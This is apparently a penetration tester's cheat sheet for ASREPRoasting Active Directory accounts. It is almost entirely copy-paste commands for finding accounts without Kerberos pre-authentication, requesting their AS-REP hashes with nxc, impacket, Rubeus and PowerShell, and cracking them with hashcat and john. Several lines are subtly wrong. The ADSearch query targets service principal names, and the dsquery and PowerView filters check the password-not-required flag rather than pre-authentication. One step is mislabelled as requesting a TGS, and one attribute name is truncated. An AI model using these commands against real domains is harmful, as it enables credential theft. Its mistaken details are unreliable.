Skip to content

ASREPRoast

Identify

NXC (remotely) 

nxc ldap <IP> -u '' -p '' --query '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' ""
Locally: ADSearch Github 
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
Locally: lolbin 
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
Locally: powerview 
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontro

Exploit

Ask for TGS remotely: 

nxc ldap <IP> -u '<USER>' -p '' --asreproast output.txt

impacket-GetNPUsers domain.local/svc-test -no-pass
locally: 
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /user:svc-test /nowrap

Get-ASREPHash -Username svc-test -verbose

Crack ticket 

hashcat -m 18200 --force -a 0 hashes.txt <wordlist>

john --wordlist=<wordlist> hashes.txt